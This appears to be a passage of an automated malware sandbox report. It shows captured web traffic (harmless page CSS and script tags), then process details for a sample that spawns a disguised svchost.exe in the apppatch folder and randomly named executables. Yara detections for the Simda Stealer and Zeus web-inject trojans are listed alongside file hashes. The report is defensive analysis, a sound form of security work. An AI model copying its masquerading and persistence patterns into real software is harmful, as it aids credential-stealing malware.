                                                                                                                                                                                                            2024-09-08 07:00:25 UTC1369INData Raw: 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 3a 6e 6f 74 28 5b 64 69 73 74 61 6e 63 65 5d 29 3a 6e 6f 74 28 5b 61 63 74 69 76 65 5d 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 30 76 68 29 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3e 69 6e 70 75 74 2c 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3e 74 65
                                                                                                                                                                                                            Data Ascii: ackground{display:none!important}amp-story-page:not(:first-of-type):not([distance]):not([active]){transform:translateY(1000vh)!important}amp-autocomplete{position:relative!important;display:inline-block!important}amp-autocomplete>input,amp-autocomplete>te
                                                                                                                                                                                                            2024-09-08 07:00:25 UTC1369INData Raw: 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 69 6e 74 72 69 6e 73 69 63 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 69 2d 61 6d 70 68 74
                                                                                                                                                                                                            Data Ascii: ight]:not(.i-amphtml-layout-intrinsic){display:inline-block;position:relative;max-width:100%}.i-amphtml-layout-intrinsic .i-amphtml-sizer{max-width:100%}.i-amphtml-intrinsic-sizer{max-width:100%;display:block!important}.i-amphtml-layout-container,.i-ampht
                                                                                                                                                                                                            2024-09-08 07:00:25 UTC1369INData Raw: 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 72 69 67 68 74 3a 30 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 72 65 70 6c 61 63 65 64 2d 63 6f 6e 74 65 6e 74 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 74 6f 70 3a 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 65 66
                                                                                                                                                                                                            Data Ascii: out-size-defined .i-amphtml-fill-content{position:absolute;top:0;left:0;bottom:0;right:0}.i-amphtml-replaced-content,.i-amphtml-screen-reader{padding:0!important;border:none!important}.i-amphtml-screen-reader{position:fixed!important;top:0px!important;lef
                                                                                                                                                                                                            2024-09-08 07:00:25 UTC1369INData Raw: 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3e 69 6d 67 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68
                                                                                                                                                                                                            Data Ascii: ut]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-element)[i-amphtml-ssr]>img.i-amphtml-fill-content{display:block}.i-amphtml-notbuilt:not(.i-amphtml-layout-container),[layout]:not([layout=container]):not(.i-amphtml-element),[width][heigh
                                                                                                                                                                                                            2024-09-08 07:00:25 UTC1369INData Raw: 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 61 74 74 72 28 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 29 7d 69 2d 61 6d 70 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 2c 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c
                                                                                                                                                                                                            Data Ascii: splay:none!important}.i-amphtml-element-error{background:red!important;color:#fff!important;position:relative!important}.i-amphtml-element-error:before{content:attr(error-message)}i-amp-scroll-container,i-amphtml-scroll-container{position:absolute;top:0;l
                                                                                                                                                                                                            2024-09-08 07:00:25 UTC1369INData Raw: 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 70 78 29 7b 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 3e 73 65 63 74 69 6f 6e 29 3e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 66 65 66 65 66 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 66 64 66 64 66 7d 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 3e 73
                                                                                                                                                                                                            Data Ascii: rm [submit-success],form [submitting]{display:none}amp-accordion{display:block!important}@media (min-width:1px){:where(amp-accordion>section)>:first-child{margin:0;background-color:#efefef;padding-right:20px;border:1px solid #dfdfdf}:where(amp-accordion>s
                                                                                                                                                                                                            2024-09-08 07:00:25 UTC1369INData Raw: 73 22 20 74 79 70 65 3d 22 6d 6f 64 75 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 6e 6f 6d 6f 64 75 6c 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 76 30 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 76 30 2f 61 6d 70 2d 62 69 6e 64 2d 30 2e 31 2e 6d 6a 73 22 20 61 73 79 6e 63 3d 22 22 20 63 75 73 74 6f 6d 2d 65 6c 65 6d 65 6e 74 3d 22 61 6d 70 2d 62 69 6e 64 22 20 74 79 70 65 3d 22 6d 6f 64 75 6c 65 22 20
                                                                                                                                                                                                            Data Ascii: s" type="module" crossorigin="anonymous"></script><script async nomodule src="https://cdn.ampproject.org/v0.js" crossorigin="anonymous"></script><script src="https://cdn.ampproject.org/v0/amp-bind-0.1.mjs" async="" custom-element="amp-bind" type="module"


                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:02:58:41
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\5AFlyarMds.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\5AFlyarMds.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:216'064 bytes
                                                                                                                                                                                                            MD5 hash:FCF6DE7351633752CF96E861D60B2A8C
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000003.1736218436.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000003.1736218436.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                            Start time:02:58:42
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\apppatch\svchost.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:216'064 bytes
                                                                                                                                                                                                            MD5 hash:9A96CBEB34AD570586652BD7772616D6
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000002.2975747606.00000000029B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2122838115.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2116591333.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2148937854.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2148202911.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2085563503.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2139994555.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2148457384.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2132018023.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000001.00000003.1744696339.0000000000888000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.1744696339.0000000000888000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2150985581.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2119790321.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2134678056.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2144510706.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2083010707.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2143538068.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000002.2976326837.0000000002CF3000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2147883397.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2148685865.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2125875066.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2142779686.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2150623127.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2106522225.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2144870121.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2149738925.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.1746712616.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000002.2975747606.0000000002A06000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2145983048.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2112552802.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2143058636.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2078582889.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2147384986.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2150345002.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2145386230.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2128505647.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2079510438.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2150022133.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.2109527836.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000001.00000003.1744603416.0000000000888000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.1744603416.0000000000888000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                            Start time:02:59:16
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.2309709711.00000000015E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.2310035862.0000000002F60000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                            Start time:02:59:16
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.2323573296.0000000002550000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.2323493665.00000000023F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                            Start time:02:59:16
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000008.00000002.2334858118.00000000025C0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
